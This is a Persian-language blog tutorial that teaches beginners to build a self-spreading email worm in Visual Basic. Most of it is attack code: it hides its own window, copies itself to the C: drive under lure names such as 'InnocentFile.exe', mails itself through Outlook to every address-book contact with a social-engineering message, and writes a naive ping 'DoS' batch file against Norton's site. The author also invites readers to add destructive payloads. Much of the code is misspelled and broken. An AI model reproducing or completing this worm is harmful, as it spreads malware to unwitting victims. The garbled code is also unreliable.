نوشتن يک کرم اينترنتی


من اين مقاله رو طوري مينويسم که همه افراد تو اين سايت حتي کساني که مبتدي هستند بتونند خيلي راحت يه worm بنويسند. در اخر لطفا هر کسي که در زمينه ي نوشتن کرم يا ويروس مهرت داره نظر هش رو برای من اسمل يا در قسمت ايده بنويسه

خوب حالا با هم شروع ميکنيم :

 کرم يا همون worm برنامه ساده اي که ميتونه خودش رو در ماشين های مختلف پخش کنه و

مثل ويروس فايل هاي مختلف يه ماشين رو الوده کنه ولي فرق اساسي اون با ويروس در اينه که

ويروس براي الوده کردن ماشين بايد فرستاده بشه به صورت دستي پخش بشه اما کرم مي تونه

خودش رو از راه هاي متفاوت پخش کنه.

حالا براي اينکه شروع به نوشتن اين کرم بکنيم اول از همه بايد يه زبان برنامه نويسي رو روي

کامپيوترخودتون داشته باشين که درنوشتن اين کرم ما از visual basic استفاده مي کنيم.

اين  کرم کرم ساده ای هست ولي قدرتمند هم هست.

حالا visual basic رو باز کنين . حالت standrad.exe رو انتخاب کنين خوب حالا شما

روي صفحه يه پنجره با نام Form1 رو مي بينيد روش Double click کنيد.

پنجره اي باز مي شه که پنجره کد نويسي هست.و توش اين ها نوشته شدند .

شما بايد کد هايي رو که من ميگم بين اينا بنويسيد(اينايي که گفتم شايد همه بلد باشيد ولي من اين

احتمال رو در نظر ميگيرم که شايد کسي پيدا شه و اينا رو بلد نباشه)

Private Form_SubLoad()


End Sub

براي اينکه کرمتون يه کرم خوب بشه بايد بتونه خودش رو پنهان نگه داره. براي اين کار در sual basic

جهت مخفي کردن هر پنجره اي از کدهاي  Me.Hide و Form1.visible=False استفاده

مي کنن.پس اين کد ها رو وارد ميکنيم. تا حالا بايد کد هاتون شبيه اين شده باشه.

Private Form_SubLoad()
Me.Hide
Form1.Visible = False
End Sub


تا حالا کرم ما فقط بلده که خودشو مخفي کنه.خب حالا بيا ين قلب اين کرم رو بنويسيم.يکworm  مي تونه کارهاي زيادي مثل:

ايميل زدن
Injection
الوده کردن فايل ها
اشتراک گذاري فايل
Exploit مثل اکسپلويت هايي که win32.balster انجام مي داد
و messenger Exploits


ما در اين کرم مي ريم که ايميل زدن و اشتراک گذاري و حمله DDOS رو داشته باشيم.

البته ما يه کار ديگم از کرم مون ميخوايم و اون  کپي کردن خودشه.ممکنه بپرسيد اين کار واسه چي لازمه؟ در جواب بايد بگم که اين کرم خودش رو در ايميل Attachments خودش رو Launch ميکنه بنابراين هر وقت که کاربر restart کنه delete ميشه.پس اگر خودش رو درجاهاي مختلف ماشين کاربر کپي کنه هميشه اين شانس هست که که ماشين دوباره الوده به کرم

بشه .پس بيا يد به کرممون ياد بديم که خودش رو کپي کنه.خب پس خواستيم که کرم مثلا خودش رو تو درايوC با نام هاي مختلف کپي کنه.( شما هر اسمي که دوست داريد بذارين ) من اين اسم ها رو ميذارم:

C:\Worm1.exe
nocentFile.exe
C:\Me.exe
C:\OpenMe!.exe

خوب حالا کدهاي زير رو وارد کنيد

Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"

خوب حالا اين کدها رو تحليل مي کنم تا سر در بيارين جريانشون چيه

 Filcopy :اين يعني اينکه فايل رو کپي کن

App.Patch : اين به اين معني هست که Application patch رو کپي خواهد کرد.

App.EXEName : به اين معني هست که بايد Application اصلي رو با پسوند exe کپي کنه.

بقيشم که واضح و جاش رو توضيح ميده که شما مي تونيد مکان کپي رو هر جا دوست دارين قرار بدين.

تا اينجاش اميدوارم زياد گيج نشده باشيد .

حالا کداتون بايد شبيه براي من شده باشه

Private Form Sub_Load()
Me.hide
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"
End Sub

راستي در مورد کد مخفي شدن کرم فکر ميکنم يکيش يعني Me.hide کافي باشه.

تا حالا کرممون ياد گرفته که کپي بشه و خودش رو مخفي کنه.

حالا بايد يه کاري بکنيم که خودش رو در ماشينهاي مختلف پخش کنه براي اين کار شما بايد

کدهاي مربوط به ايميل رو وارد کنيم .

منظورم کد هاي زير هست :

Set so = CreateObject(fso)
Set ol = CreateObject("Outlook.Application")
Set out = Wscript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X)
Mail.Subject = "Fwd:None"
Mail.Body = "Do you want to suprise your wife or husband? Do you want to do something Romantic for them?
Wanna find out how to get lucky Sydney has made this Awesome Document Attached. It tells men everything a
Lady wants! And Ladies you can add stuff onto it before forwarding it to all your freinds!"
Mail.Attachments.Add = "C:\Worm1.exe"
Mail.Send
Next
ol.Quit

در قسمت mail body هر مطلبي دوست داشتيد بنويسيد. و دقت کرديد که کرم از طريق outlook پخش مي شه. به احتمال خيلي زياد موقع کامپايل برنامه تو اين قسمت کدهاي ايميل بهتون يه error ميده که به احتمال زياد تو همون خط اول ارور ميده. به هر حال تو هر خطي که ارور داد فقط اون خط روDelete کنيد. به هر حال کد برنامه تون بايد شبيه يه همچين چيزي شده باشه.

Private Form Sub_Load()
Me.hide
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"
Set so = CreateObject(fso)
Set ol = CreateObject("Outlook.Application")
Set out = Wscript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X)
Mail.Subject = "Fwd:None"
Mail.Body = "Do you want to suprise your wife or husband? Do you want to do something Romantic for them?
Wanna find out how to get lucky Sydney has made this Awesome Document Attached. It tells men everything a
Lady wants! And Ladies you can add stuff onto it before forwarding it to all your freinds!"
Mail.Attachments.Add = "C:\Worm1.exe"
Mail.Send
Next
ol.Quit
End Sub

خوب فعلا بدنه کرم اماده هستش حالا ديگه بقيه کار به عهده خودتونه . منظورم از بقيه کار قرار دادن کدهای  مخرب هست ز اين به بعد ديگه بقيه هکر هاي سايت هر چي کد مخرب

دارن بيان بريزن تو اين تاپيک تا کرماي وحشتناکي درست بشه. راستي داشت يادم ميرفت که کدهايي که حمله DOS انجام ميدن رو بگم.من تا حالا اينا رو امتحان نکردم ولي تجربه ميگه کد ها جواب ميدند.

Open "C:\Dos.bat" for output as #2
Print #2, "Ping www.Norton.com"
Print #2, "Ping www.Norton.com"
Close #1

 ببينم تا چه اندازه توانايی انجام اين کار رو داريد اگر هم مشکلی در اين بود و کسی ميدونست بهم بگه.

  
نویسنده : esfandiar baharloo ; ساعت ۸:٤۳ ‎ب.ظ روز یکشنبه ۱٦ آذر ،۱۳۸٢